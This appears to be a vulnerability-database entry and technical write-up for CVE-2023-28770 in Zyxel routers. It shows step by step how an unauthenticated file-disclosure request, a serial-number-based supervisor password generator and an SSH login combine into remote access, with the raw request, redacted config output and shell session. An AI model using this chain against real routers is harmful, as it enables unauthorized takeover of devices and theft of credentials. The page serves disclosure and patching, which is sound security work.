Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
3

CVE-2023-28770

Disclosure Date: April 27, 2023
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
Initial Access
Techniques
Validation
Validated
Validated

Description

The sensitive information exposure vulnerability in the CGI “Export_Log” and the binary “zcmd” in Zyxel DX5401-B0 firmware versions prior to V5.17(ABYO.1)C0 could allow a remote unauthenticated attacker to read the system files and to retrieve the password of the supervisor from the encrypted file.

Add Assessment

2
Ratings
Technical Analysis

In December 2022, SEC Consult released a blog with the title The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users . The blog explains an unauthenticated buffer overflow in more then 40 different Zyxel router models and the fast amount of thousands of routers that are vulnerable and accessible via the Internet.
The impact is still quite limited because the published Metasploit exploit module only works from the LAN side.

However, the Unauthenticated Buffer Overflow is not the only vulnerability on these routers and SEC Consult discovered another 7 vulnerabilities that are described in their security analysis Multiple Critical Vulnerabilities in multiple Zyxel devices.
While reading the security analysis and reviewing the other vulnerabilities, I discovered a new opportunity to build an exploit by chaining two other vulnerabilities that will allow an unauthenticated attacker to get privileged access to the Zyxel router from either the WAN or LAN side. The potential of this exploit to attack from the WAN side makes it quite dangerous taking into account the large number of non-patched Zyxel routers out there on the Internet.

Recently, CVE-2023-28770 has been released covering the LFI vulnerability that is used in this chained exploit.

Zyxel router chained RCE

Exploiting an unauthenticated local file disclosure (LFI) vulnerability and a weak password derivation algorithm

The first vulnerability that stood out to me is the LFI vulnerability that is discussed in section 2 of the Security Analysis by SEC Consult.
The LFI vulnerability is present in the zhttp binary that allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json.

The burp request below shows a redacted response of the information that is disclosed such as encrypted passwords, account information, information on services configuration (FTP, Telnet, SSH), and hardware details such as serial number, hardware model etc. In total around 4000 lines of nested JSON information that you would not like to share with anyone out there.

LFI Burp request and response

GET /Export_Log?/data/zcfg_config.json HTTP/1.1
Host: zyxel-vuln-router:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Connection: close

Response (REDACTED)

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 148678
Date: Fri, 14 Apr 2023 08:47:46 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'

---- Hardware Information ----
{
    "Manufacturer":"ZYXEL",
    "ManufacturerOUI":"XXXXX",
    "ModelName":"VMG3625-T20A",
    "Description":"Wireless AC VDSL2 4-port Gateway with USB",
    "ProductClass":"VMG3625-T20A",
    "SerialNumber":"S000Y00000000",
    "SoftwareVersion":"V5.30(ABOU.2)b1_I0_20180821",
    "AdditionalHardwareVersion":"",
    "AdditionalSoftwareVersion":"",
    "UpTime":607055,
    "FirstUseDate":"2023-03-21T09:07:41",
    "VendorConfigFileNumberOfEntries":0,
    "SupportedDataModelNumberOfEntries":0,
    "ProcessorNumberOfEntries":0,
    "VendorLogFileNumberOfEntries":0,
    "LocationNumberOfEntries":0,
    "FixManufacturerOUI":""
  },

---- Account Information----
"X_ZYXEL_LoginCfg":{
    "LoginGroupConfigurable":true,
    "LogGp":[
      {
        "GP_Privilege":"_encrypt_XXXXXXXXXXXXXX",
        "Account":[
          {
            "AutoShowQuickStart":false,
            "Enabled":true,
            "EnableQuickStart":true,
            "Page":"",
            "Username":"root",
            "Password":"",
            "PasswordHash":"",
            "Privilege":"_encrypt_XXXXXXXXXXXXX",
            "GetConfigByFtp":true,
            "DefaultPassword":"_encrypt_XXXXXXXXXXXXXX",
            "DefaultGuiPassword":"",
            "ResetDefaultPassword":false,
            "shadow":"root:$6$XXXXXXXXXXX:0::::::\n",
            "smbpasswd":"root:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U          ]:LCT-0000004E:\n",
            "ConfigAccountFromWAN":false,
            "DefPwLength":8,
            "AccountCreateTime":0,
            "AccountRetryTime":3,
            "AccountIdleTime":300,
            "AccountLockTime":300,
            "RemoHostAddress":"",
            "DotChangeDefPwd":false,
            "ShowSkipBtnInChgDefPwdPage":false,
            "AutoGenPwdBySn":false,
            "RemoteAccessPrivilege":"LAN",
            "OldDefaultPassword":"",
            "CardOrder":"",
            "ThemeColor":"",
            "HiddenPage":""
          },
          {
            "AutoShowQuickStart":false,
            "Enabled":true,
            "EnableQuickStart":true,
            "Page":"",
            "Username":"supervisor",
            "Password":"",
            "PasswordHash":"",
            "Privilege":"_encrypt_XXXXXXXXXXX",
            "DefaultPassword":"_encrypt_XXXXXXXXXXX",
            "DefaultGuiPassword":"",
            "ResetDefaultPassword":false,
            "shadow":"supervisor:$6$XXXXXXXXXX:0::::::\n",
            "smbpasswd":"supervisor:12:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U          ]:LCT-0000004E:\n",
            "ConfigAccountFromWAN":false,
            "DefPwLength":8,
            "AccountCreateTime":0,
            "AccountRetryTime":3,
            "AccountIdleTime":300,
            "AccountLockTime":300,
            "RemoHostAddress":"",
            "DotChangeDefPwd":false,
            "ShowSkipBtnInChgDefPwdPage":false,
            "AutoGenPwdBySn":false,
            "RemoteAccessPrivilege":"LAN",
            "OldDefaultPassword":"",
            "CardOrder":"",
            "ThemeColor":"",
            "HiddenPage":""
          }
        ],
        "Level":"high"
      },

---- Service Information ----
  "X_ZYXEL_RemoteManagement":{
    "Service":[
      {
        "Name":"HTTP",
        "Enable":true,
        "Protocol":6,
        "Port":8080,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":1,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"HTTPS",
        "Enable":true,
        "Protocol":6,
        "Port":443,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"FTP",
        "Enable":true,
        "Protocol":6,
        "Port":21,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"TELNET",
        "Enable":true,
        "Protocol":6,
        "Port":23,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"SSH",
        "Enable":true,
        "Protocol":6,
        "Port":22,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },

Now this information disclosure in itself will not pose a direct threat to these routers, but of course attackers could try to crack the obtained encrypted shadow passwords, but this will take a long time.

So is there any other way to use the disclosed information for a successful attack?
And of course the answer is YES!

The second vulnerability that comes into play is the vulnerability described in section 3 of the analysis, “Unsafe Storage of Sensitive Data”.
It explains the password derivation technique used to decrypt the _encrypted_XXXXXX passwords in the JSON configuration file using a static AES Key and IV.
But my attention was more drawn to another analysis Getting root on a Zyxel VMG8825-T50 router done by Thomas Rinsma in 2020 that was referenced at the bottom of the section and where Thomas explains the password derivation techniques used on Zyxel routers.
In particular, section “Tangent 2: key and password derivation mechanisms” is quite interesting which describes in detail how the supervisor user password can be derived using the serial key of the router.

So what if we use the LFI vulnerability to get the serial key of the router and try to crack the supervisor password using this password derivation technique.
We can then use the disclosed router services information to check if ssh or telnet is enabled and accessible from the WAN and try to login as supervisor to gain access to the router.

Bogi Napoleon Wennerstrøm has reverse engineered and implemented some of these derivation functions producing the supervisor password.
His repository can be found here on Github.
I tested his password derivation functions and indeed I can confirm that either zcfgBeCommonGenKeyBySerialNumMethod2 or zcfgBeCommonGenKeyBySerialNumMethod3 are working on vulnerable Zyxel routers.

# python ./main.py S000Y00000000
zcfgBeCommonGenKeyBySerialNum                   : A43338B488
zcfgBeCommonGenKeyBySerialNum_CBT               : UdcTaX78
zcfgBeCommonGenKeyBySerialNumMethod2            : 2dc1a078  <==
zcfgBeCommonGenKeyBySerialNumMethod3            : 58Pxnwdefr <==
zcfgBeCommonGenKeyBySerialNumConfigLength(1)    : EXXAY7XF
zcfgBeCommonGenKeyBySerialNumConfigLength(2)    : 4UxwvUxf
zcfgBeCommonGenKeyBySerialNumConfigLength(3)    : 4UxavUxf
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(1) : EXXAY7XF
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(2) : 4UxwvUxf
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(3) : 4UxavUxf
┌──(root💀cuckoo)-[~/zyxel_exploit/zyxel-vmg8825-keygen]
└─# ssh supervisor@zyxel-vuln-router
supervisor@zyxel-vuln-router's password:
$ uname -a
Linux VMG3625-T20A 2.6.36 #7 SMP Sat Aug 18 12:18:02 CET 2018 mips GNU/Linux
$ id
uid=12(supervisor) gid=12 groups=12
$

I have created a Metasploit module that chains these two vulnerabilities together to gain access to vulnerable Zyxel routers.
PR submission to mainstream Metasploit is completed and available.

Mitigation

Please follow this Security Advisory of Zyxel to patch your router.
As temporary measure, you should disable all your services on the router such as telnet, ftp and ssh that allows access to the supervisor user and configure your web interface only to be accessible by the admin user.

References

CVE-2023-28770
The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users .
Multiple Critical Vulnerabilities in multiple Zyxel devices.
Getting root on a Zyxel VMG8825-T50 router
Zyxel VMG8825-T50 Supervisor Keygen – Github
Zyxel Security Advisory
Metasploit PR: Zyxel router chained RCE using LFI and weak password derivation algorithm

Credits

Credits goes to:
SEC Consult team
Thomas Rinsma
Bogi Napoleon Wennerstrøm

CVSS V3 Severity and Metrics
Base Score:
7.5 High
Impact Score:
3.6
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • zyxel

Products

  • dx5401-b0 firmware

Additional Info

Technical Analysis